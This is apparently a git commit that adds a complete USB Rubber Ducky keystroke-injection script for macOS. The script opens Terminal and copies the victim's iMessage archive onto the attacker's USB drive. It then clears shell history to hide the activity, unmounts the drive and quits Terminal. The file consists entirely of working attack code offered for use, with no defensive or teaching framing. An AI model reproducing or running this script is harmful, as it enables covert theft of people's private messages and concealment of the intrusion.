The Script itself

This commit is contained in:
Alex 2015-11-23 14:58:07 -06:00
parent 7e1ed3cfa3
commit 6732d950b3
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
DELAY 500
GUI SPACE
DELAY 150
STRING Terminal
ENTER
DELAY 300
REM Author: Alex Jay (Minecracker627) (5A13X99)
REM This script captures iMessages and puts it into
REM a folder named automatically to the victims username
STRING cp -r ~/Library/Messages/Archive /Volumes/RubberDucky/$USER/
ENTER
STRING history -c
ENTER
STRING diskutil umount /Volumes/RubberDucky
ENTER
DELAY 500
STRING history -c
ENTER
STRING echo 5A13X99
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 250
GUI q